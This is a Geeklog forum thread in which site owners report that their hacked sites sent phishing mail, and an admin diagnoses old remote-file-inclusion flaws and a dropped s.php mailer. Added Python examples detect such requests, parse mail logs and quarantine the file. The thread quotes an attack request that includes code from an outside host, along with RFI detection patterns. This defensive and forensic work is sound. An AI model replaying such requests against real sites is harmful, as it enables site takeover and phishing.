Welcome to Geeklog, Anonymous Friday, March 29 2024 @ 10:48 am EDT


phishing mails


Status: offline

Goofy

Forum User
Newbie
Registered: 03/02/07
Posts: 6
Someone has hacked my site and sent 1203 phishing mails for RBC Royal Bank.

My ISP sent me information that the problem is in:
GET /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http:// crazedey . 110mb. com / smp. txt?

He has suspended my site until I fix the problem.
I am using Version 1.4.1.

Does anyone know what to do!

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location: Stuttgart, Germany
The request you quoted from your ISP doesn't make sense in two ways:

1) This is not a valid path, i.e. no file exists with that URL, so it can't do anything.
2) The problem this script kiddie tried to exploit has been fixed in Geeklog 1.4.1.

We are seeing hundreds of these requests here on geeklog.net every day - they simply don't do anything any more. So if you're 100% sure that you are on Geeklog 1.4.1 and that it was installed (or possibly upgraded, from an earlier version) correctly, then this is NOT the cause of whatever has happened.

Do you have any other plugins installed on your site? For example, both MediaGallery and the CAPTCHA plugin had a very similar problem at one point (updates for both have been released in May of this year).

bye, Dirk
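Dirk's two points (the doubled script path and the `_CONF[path]=http://...` parameter) are exactly what a defender can match on when reviewing the web server's access log. The following is an added example, not Geeklog's own code and not from this thread: it splits a request line, flags a doubled path separator, any attempt to set a `_CONF[...]` entry from the query string, and any parameter whose value is a URL on another host. The request lines are constructed; `example.invalid` is a placeholder host, and the last sample shows that a bare remote URL in an ordinary parameter is a weaker indicator than the first two.

```python
"""Flag HTTP request lines that match the remote-file-inclusion pattern quoted
in this thread: a query parameter that tries to set a PHP configuration array
entry (_CONF[...]) to a URL on another host.  Added example, not Geeklog code;
the request lines below are constructed and example.invalid is a placeholder."""
from urllib.parse import urlsplit, parse_qsl

REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Constructed request fields in the shape of an access-log entry.
SAMPLE_REQUESTS = [
    "GET /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/"
    "BaseAdmin.class.php?_CONF[path]=http://example.invalid/smp.txt? HTTP/1.1",
    "GET /index.php?topic=news HTTP/1.1",
    "GET /plugins/spamx/BaseAdmin.class.php?_CONF[path_system]=ftp://example.invalid/x.txt? HTTP/1.1",
    "GET /search.php?query=http%3A%2F%2Fexample.invalid HTTP/1.1",
]


def analyse_request(request_line):
    """Return the reasons a request looks like an RFI attempt ([] if none)."""
    parts = request_line.split()
    target = parts[1] if len(parts) >= 2 else request_line
    url = urlsplit(target)
    reasons = []
    # A doubled separator inside the path is the tell-tale of one script path
    # being appended to another, as in the request the ISP quoted.
    if "//" in url.path.lstrip("/"):
        reasons.append("doubled path separator")
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        # Overwriting $_CONF from the query string only works when
        # register_globals is on, but the attempt itself is worth logging.
        if key.startswith("_CONF["):
            reasons.append(f"attempt to set configuration variable {key}")
        if value.lower().startswith(REMOTE_SCHEMES):
            reasons.append(f"remote URL in parameter {key}")
    return reasons


def scan(request_lines):
    """Map each suspicious request line to its reasons; clean lines are omitted."""
    return {line: r for line in request_lines if (r := analyse_request(line))}


if __name__ == "__main__":
    for line, reasons in scan(SAMPLE_REQUESTS).items():
        print(line.split()[1][:60], "->", "; ".join(reasons))
```

On a patched 1.4.1 install these requests are noise, as Dirk says; the value of the check is that a burst of them against a plugin that has not been updated tells you where to look first.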

Status: offline

Goofy

Forum User
Newbie
Registered: 03/02/07
Posts: 6
Hi Dirk,

Blaine has upgraded my site to 1.4.1

I have these plugins installed on my site:
calendar 1.0.0
chatterblock 1.3.11 (not enabled)
forum 2.6
glmenu 2.5
links 1.0.1
mediagallery 1.4.7
messenger 1,7
newsletter 1.0
polls 1.1.0
registration 1.2
spamx 1.1.0
staticpages 1.4.3
filemgmt 1.5.2


Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location: Stuttgart, Germany
Quote by: Goofy

mediagallery 1.4.7

I can't vouch for all the plugins you listed (for example, I don't even know the newsletter plugin), but that version of MediaGallery is vulnerable. See Mark's posting: Security Vulnerability in Media Gallery v1.4x

bye, Dirk

Lex

Anonymous
I just got an email from my host saying something similar. They said to check my mail logs to see which script is being exploited. It looks like spamx is being exploited? Any suggestions on how to solve this?

This is what my mail log says:

2007-12-10 12:52:29 u35565200 3oUgls-1J1mnt2mdy-0005zH |< REMOTE=41.211.226.167 SCRIPT=/club80s/plugins/spamx/templates/s.php -- /usr/sbin/sendmail -t -i
2007-12-10 12:52:29 u35565200 3oUgls-1J1mnt2mdy-0005zH <= S=accounts.verisign@key.com SZ=4166 D=0 SID=90628944
2007-12-10 12:52:31 u35565200 3oUgls-1J1mnt2mdy-0005zH => johnboy3159@yahoo.com msmtp.perfora.net[172.19.143.3] 250 Message 0MKp8S-1J1mnt36ye-0006RO accepted by mrus0.perfora.net
2007-12-10 12:52:31 u35565200 3oUgls-1J1mnv3Pci-0005zd |< REMOTE=41.211.226.167 SCRIPT=/club80s/plugins/spamx/templates/s.php -- /usr/sbin/sendmail -t -i
2007-12-10 12:52:31 u35565200 3oUgls-1J1mnv3Pci-0005zd <= S=accounts.verisign@key.com SZ=4167 D=0 SID=90628944
2007-12-10 12:52:33 u35565200 3oUgls-1J1mnv3Pci-0005zd => johnboy38375@yahoo.com msmtp.perfora.net[172.19.143.3] 250 Message 0MKp8S-1J1mnv3gdN-0006Lm accepted by mrus0.perfora.net
2007-12-10 13:58:40 u35565200 3oUgls-1J1npw11YB-0002OY |< REMOTE=82.78.173.224 SCRIPT=/club80s/plugins/spamx/Mass.php -- /usr/sbin/sendmail -t -i
2007-12-10 13:58:40 u35565200 3oUgls-1J1npw11YB-0002OY <= S=cgi-mailer-bounces-90628944@perfora.net SZ=695 D=0 SID=90628944
2007-12-10 13:58:42 u35565200 3oUgls-1J1npw11YB-0002OY => kaiowas2000@gmail.com msmtp.perfora.net[172.19.143.3] 250 Message 0MKpCa-1J1npx0asO-0001wq accepted by mrus1.perfora.net
2007-12-10 13:58:55 u35565200 3oUgls-1J1nqB0wKW-0002R0 |< REMOTE=82.78.173.224 SCRIPT=/club80s/plugins/spamx/Mass.php -- /usr/sbin/sendmail -t -i
2007-12-10 13:58:55 u35565200 3oUgls-1J1nqB0wKW-0002R0 <= S=cgi-mailer-bounces-90628944@perfora.net SZ=695 D=0 SID=90628944
2007-12-10 13:58:56 u35565200 3oUgls-1J1nqB0wKW-0002R0 => kaiowas2000@gmail.com msmtp.perfora.net[172.19.143.3] 250 Message 0MKp8S-1J1nqB2cVu-0006QH accepted by mrus0.perfora.net
2007-12-10 13:59:05 u35565200 3oUgls-1J1nqL0bJq-0002Ti |< REMOTE=82.78.173.224 SCRIPT=/club80s/plugins/spamx/Mass.php -- /usr/sbin/sendmail -t -i
2007-12-10 13:59:05 u35565200 3oUgls-1J1nqL0bJq-0002Ti <= S=cgi-mailer-bounces-90628944@perfora.net SZ=695 D=0 SID=90628944
2007-12-10 13:59:06 u35565200 3oUgls-1J1nqL0bJq-0002Ti => kaiowas2000@gmail.com msmtp.perfora.net[172.19.143.3] 250 Message 0MKp8S-1J1nqL0yNw-0006Bx accepted by mrus0.perfora.net
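The mail log above has three line kinds per message: `|<` (which web script invoked sendmail and from which remote address), `<=` (envelope sender and size) and `=>` (recipient and relay result). Grouping them by message id and then by invoking script is how you answer the host's question of which script is being exploited. The following is an added example, not part of this thread and not Geeklog code: it parses log text in that format, summarises per script, and lists every script that sent mail but is not on a list of known legitimate mailers. The log lines are constructed (documentation-range IPs, addresses under `example.invalid`), and the `KNOWN_MAILERS` set is an assumption you would fill in for your own site.

```python
"""Group a CGI mail log of the kind quoted in this thread by message id and by
invoking script.  Added example, not Geeklog code.  The log below is
constructed: IPs are from the RFC 5737 documentation ranges and all addresses
are under example.invalid."""
import re
from collections import defaultdict

SAMPLE_LOG = """\
2007-12-10 12:52:29 u000 id-0001 |< REMOTE=192.0.2.10 SCRIPT=/club80s/plugins/spamx/templates/s.php -- /usr/sbin/sendmail -t -i
2007-12-10 12:52:29 u000 id-0001 <= S=accounts.verisign@key.example.invalid SZ=4166 D=0 SID=1
2007-12-10 12:52:31 u000 id-0001 => victim1@example.invalid relay[198.51.100.3] 250 accepted
2007-12-10 12:52:31 u000 id-0002 |< REMOTE=192.0.2.10 SCRIPT=/club80s/plugins/spamx/templates/s.php -- /usr/sbin/sendmail -t -i
2007-12-10 12:52:31 u000 id-0002 <= S=accounts.verisign@key.example.invalid SZ=4167 D=0 SID=1
2007-12-10 12:52:33 u000 id-0002 => victim2@example.invalid relay[198.51.100.3] 250 accepted
2007-12-10 13:58:40 u000 id-0003 |< REMOTE=203.0.113.7 SCRIPT=/club80s/plugins/spamx/Mass.php -- /usr/sbin/sendmail -t -i
2007-12-10 13:58:40 u000 id-0003 <= S=cgi-mailer-bounces@example.invalid SZ=695 D=0 SID=1
2007-12-10 13:58:42 u000 id-0003 => someone@example.invalid relay[198.51.100.3] 250 accepted
2007-12-10 14:01:00 u000 id-0004 |< REMOTE=198.51.100.20 SCRIPT=/club80s/users.php -- /usr/sbin/sendmail -t -i
2007-12-10 14:01:00 u000 id-0004 <= S=noreply@example.invalid SZ=900 D=0 SID=1
2007-12-10 14:01:01 u000 id-0004 => member@example.invalid relay[198.51.100.3] 250 accepted
"""

# Scripts that legitimately send mail on this (hypothetical) site; an assumption.
KNOWN_MAILERS = {"/club80s/users.php"}

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<user>\S+) (?P<msgid>\S+) (?P<kind>\|<|<=|=>) (?P<rest>.*)$"
)


def _kv(text):
    """Turn 'A=1 B=2' into {'A': '1', 'B': '2'}, ignoring bare tokens."""
    return dict(tok.split("=", 1) for tok in text.split() if "=" in tok)


def parse_mail_log(text):
    """One record per message id: script, remote IP, sender, size, recipients."""
    messages = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rec = messages.setdefault(m["msgid"], {"ts": m["ts"], "recipients": []})
        kind, rest = m["kind"], m["rest"]
        if kind == "|<":                      # which web script called sendmail
            fields = _kv(rest.split(" -- ")[0])
            rec["remote"], rec["script"] = fields.get("REMOTE"), fields.get("SCRIPT")
        elif kind == "<=":                    # envelope sender and size
            fields = _kv(rest)
            rec["sender"], rec["size"] = fields.get("S"), int(fields.get("SZ", 0))
        elif kind == "=>":                    # one line per recipient
            rec["recipients"].append(rest.split()[0])
    return messages


def summarise_by_script(messages):
    """Per invoking script: message count, distinct remotes, senders, recipients."""
    summary = defaultdict(lambda: {"messages": 0, "remotes": set(), "senders": set(), "recipients": set()})
    for rec in messages.values():
        s = summary[rec.get("script")]
        s["messages"] += 1
        s["remotes"].add(rec.get("remote"))
        s["senders"].add(rec.get("sender"))
        s["recipients"].update(rec["recipients"])
    return summary


def suspicious_scripts(summary, known=KNOWN_MAILERS):
    """Scripts that sent mail but are not known mailers (a templates/ directory never should)."""
    return sorted(script for script in summary if script and script not in known)


if __name__ == "__main__":
    summary = summarise_by_script(parse_mail_log(SAMPLE_LOG))
    for script in suspicious_scripts(summary):
        s = summary[script]
        print(f"{script}: {s['messages']} msgs from {sorted(s['remotes'])} as {sorted(s['senders'])}")
```

The forged `accounts.verisign@...` sender together with a script under `plugins/spamx/templates/` is the combination Dirk reacts to in the next reply; the summary makes it visible without reading the log line by line.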

Lex

Anonymous
The other problem is that I can't log in because of a header issue and disable the plug-in. (Dirk, we're talking about that in another thread)

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location: Stuttgart, Germany
Quote by: Lex

2007-12-10 12:52:29 u35565200 3oUgls-1J1mnt2mdy-0005zH |< REMOTE=41.211.226.167 SCRIPT=/club80s/plugins/spamx/templates/s.php -- /usr/sbin/sendmail -t -i

That doesn't look good. There's a file "s.php" in your spamx/templates directory that shouldn't be there. Remove that file ASAP (you may want to keep a copy for forensics, but remove it from there).

Next, how did it get there? See my replies to Goofy above: There was a security issue in Geeklog (and in some plugins), but it has been fixed quite some time ago. Make sure you're up to date.

bye, Dirk
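Dirk's advice is to get the dropped file out of the web root immediately while keeping a copy for forensics. Doing both in one step, with the file's hash, size and timestamps recorded before it is moved, keeps the evidence usable later. The following is an added example, not from this thread and not Geeklog code: it lists any `.php` files under a plugin's `templates` directory (which should hold only template files) and moves each into a quarantine directory alongside a JSON record of where it came from. The `demo()` function builds a throwaway directory tree with a constructed stand-in for `s.php`, so nothing touches a real site; the paths are assumptions.

```python
"""Quarantine unexpected PHP files from a Geeklog plugin's templates directory,
preserving a copy and metadata for forensics.  Added example, not Geeklog
code; demo() works on a temporary directory with a constructed stand-in file."""
import hashlib
import json
import shutil
import tempfile
import time
from pathlib import Path


def unexpected_php_files(templates_dir):
    """Template directories hold .thtml files; any .php file there is unexpected."""
    return sorted(Path(templates_dir).rglob("*.php"))


def quarantine_file(path, quarantine_dir):
    """Copy `path` into `quarantine_dir` (timestamps preserved), write a JSON
    sidecar with hash/size/mtime/original location, then remove the original."""
    path, quarantine_dir = Path(path), Path(quarantine_dir)
    quarantine_dir.mkdir(parents=True, exist_ok=True)
    data = path.read_bytes()
    st = path.stat()
    meta = {
        "original_path": str(path.resolve()),
        "sha256": hashlib.sha256(data).hexdigest(),
        "size": st.st_size,
        "mtime": st.st_mtime,
        "quarantined_at": time.time(),
    }
    # Store under the hash so two copies of the same dropped file dedupe,
    # and with a non-executable extension so it cannot be served by accident.
    shutil.copy2(path, quarantine_dir / f"{meta['sha256']}.bin")
    (quarantine_dir / f"{meta['sha256']}.json").write_text(json.dumps(meta, indent=2))
    path.unlink()
    return meta


def demo():
    """Build a throwaway tree, plant a constructed stand-in for s.php, quarantine it."""
    root = Path(tempfile.mkdtemp())
    tmpl = root / "plugins" / "spamx" / "templates"
    tmpl.mkdir(parents=True)
    (tmpl / "s.php").write_text("<?php /* constructed stand-in for a dropped mailer */ ?>")
    (tmpl / "list.thtml").write_text("{entries}")
    found = unexpected_php_files(tmpl)
    metas = [quarantine_file(p, root / "quarantine") for p in found]
    return found, metas, root


if __name__ == "__main__":
    found, metas, root = demo()
    for m in metas:
        print(f"quarantined {m['original_path']} sha256={m['sha256']} -> {root / 'quarantine'}")
```

After quarantining, the remaining question is still the one Dirk asks next: how the file got there. The recorded mtime gives you the time window to search in the access log.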

Lex

Anonymous
Yes, I deleted that s.php file and kept a copy of it. The problem is I can't log into my site to update it because of the header problem. Doh! Guess I should get on your mailing list to be notified of updates.
